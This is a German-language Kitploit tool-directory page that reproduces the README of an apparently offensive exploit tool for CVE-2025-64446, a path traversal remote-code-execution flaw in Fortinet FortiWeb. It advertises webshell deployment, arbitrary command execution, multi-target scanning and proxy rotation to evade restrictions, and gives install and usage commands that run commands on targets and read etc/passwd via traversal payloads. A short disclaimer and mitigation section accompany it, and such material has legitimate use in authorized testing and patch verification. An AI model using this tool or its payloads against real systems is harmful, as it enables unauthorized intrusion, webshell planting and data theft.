Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-64446-fortiweb-exploit — Sicherheitsforschungstool zur Erkennung und Prüfung von CVE-2025-64446 (FortiWeb Path Traversal RCE-Schwachstelle) | Kitploit
Tools/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & BildungPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Sicherheitsforschungstool zur Erkennung und Prüfung von CVE-2025-64446 (FortiWeb Path Traversal RCE-Schwachstelle)

Repository anzeigen
113vor 10 MonatenNoch nicht geprüft
Teilen

CVE-2025-64446 Fortinet FortiWeb Path Traversal RCE-Exploit

Ein Sicherheitsforschungstool zur Erkennung und Prüfung der Sicherheitslücke CVE-2025-64446 in der Web Application Firewall (WAF) Fortinet FortiWeb. Diese kritische Zero-Day-Path-Traversal-Schwachstelle wird derzeit aktiv in freier Wildbahn ausgenutzt und ermöglicht es nicht authentifizierten Angreifern, Sicherheitskontrollen zu umgehen und beliebigen Code auszuführen.

⚠️ Disclaimer

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Der unbefugte Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

📋 Überblick

CVE-2025-64446 ist eine kritische Zero-Day-Path-Traversal-Schwachstelle in der Fortinet FortiWeb WAF, die derzeit aktiv in freier Wildbahn ausgenutzt wird. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch Path-Traversal-Angriffe Sicherheitskontrollen zu umgehen, was potenziell zu Remote-Code-Ausführung, Zugriff auf Konfigurationsdateien und vollständiger Systemkompromittierung führen kann.

CVSS-Score: 9.8 (Kritisch)
Status: Aktiv in freier Wildbahn ausgenutzt
CISA KEV: Zum Katalog der bekannten ausgenutzten Schwachstellen hinzugefügt
Patch: FG-IR-25-910
Betroffenes Produkt: Fortinet FortiWeb WAF

🔍 Funktionen

  • Automatisierte FortiWeb-Erkennung: Identifiziert FortiWeb-WAF-Bereitstellungen
  • Path-Traversal-Tests: Testet mehrere Path-Traversal-Payload-Varianten
  • Bestätigung der Schwachstelle: Verifiziert die CVE-2025-64446-Schwachstelle
  • Zugriff auf Konfigurationsdateien: Versucht, FortiWeb-Konfigurationsdateien zu lesen
  • Webshell-Bereitstellung: Demonstriert die Fähigkeit zum Hochladen einer Webshell
  • Befehlsausführung: Führt beliebige Befehle aus (für autorisierte Tests)
  • Multithreading-Unterstützung: Mehrere Ziele parallel scannen
  • Proxy-Unterstützung: Umgehung zusätzlicher Sicherheitsbeschränkungen
  • JSON-Export: Detaillierte Ergebnisse im JSON-Format
  • POC-Skript enthalten: Einfacher Proof-of-Concept-Nachweis

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip (Python-Paketmanager)

Schnellinstallation

# Clone the repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Install dependencies
pip install -r requirements.txt

# Make scripts executable (optional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternative: Direkter Download

# Download the scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Install dependencies
pip install requests

🚀 Nutzung

Grundlegende Nutzung

# Single target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Verwendung von Proxys

# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

POC-Skript

# Basic POC test
python3 cve_2025_64446_poc.py -u http://target.com

# Test specific file
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Verbose output
python3 cve_2025_64446_poc.py -u http://target.com -v

Befehlszeilenoptionen

-u, --url          Ziel-URL
-f, --file         Datei mit Ziel-URLs (eine pro Zeile)
-c, --command      Auszuführender Befehl (Standard: id)
-t, --threads      Anzahl der Threads (Standard: 1)
-o, --output       Ausgabedatei (Standard: uknf_fortiweb_results.json)
-v, --verbose      Ausführliche Protokollierung aktivieren
--proxy            Proxy-URL (z. B. http://127.0.0.1:8080)
--proxy-list       Datei mit Proxy-URLs (eine pro Zeile)

📊 Ausgabe

Das Skript generiert eine JSON-Datei mit detaillierten Ergebnissen:

{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Funktionsweise

  1. Erkennungsphase: Scannt nach FortiWeb-WAF-Indikatoren (Header, Inhalt, Fehlerseiten)
  2. Schwachstellentest: Testet mehrere Path-Traversal-Payload-Varianten
  3. Bestätigung des Path Traversal: Überprüft erfolgreichen Dateizugriff
  4. Konfigurationszugriff: Versucht, FortiWeb-Konfigurationsdateien zu lesen
  5. Ausnutzung: Falls angreifbar, demonstriert die RCE-Fähigkeit durch Webshell-Bereitstellung

🛡️ Gegenmaßnahmen

Falls Sie FortiWeb WAF verwenden:

  1. Sicherheitsupdates sofort einspielen:

    # Check current version
    show system status
    
    # Update to latest version
    execute upgrade <firmware-file>
    
    • Referenz: FG-IR-25-910
  2. Netzwerksegmentierung:

    • Zugriff auf die FortiWeb-Verwaltungsoberfläche einschränken
    • Netzwerk-ACLs implementieren
    • VPN für administrativen Zugriff verwenden
  3. Konfigurationshärtung:

    • Nicht benötigte Funktionen deaktivieren
    • Strenge Zugriffskontrollen implementieren
    • Umfassende Protokollierung und Überwachung aktivieren
  4. CISA-Anforderungen:

    • Bundesbehörden müssen innerhalb von 7 Tagen patchen
    • CISA-KEV-Katalog auf Aktualisierungen überwachen

📚 Referenzen

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • CISA KEV Catalog: CVE-2025-64446
  • Tenable Blog: CVE-2025-64446 Analysis

📖 Beispiele

Beispiel 1: Einzelziel-Scan

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Beispiel 2: Mehrere Ziele mit Ausgabe

# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Beispiel 3: Benutzerdefinierte Befehlsausführung

python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Beispiel 4: Verwendung von Proxys

# Single proxy
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Beispiel 5: POC-Tests

# Basic POC
python3 cve_2025_64446_poc.py -u https://example.com

# Test specific file
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Mitwirken

Beiträge sind willkommen! Zögern Sie nicht, einen Pull Request einzureichen.

Tool herunterladen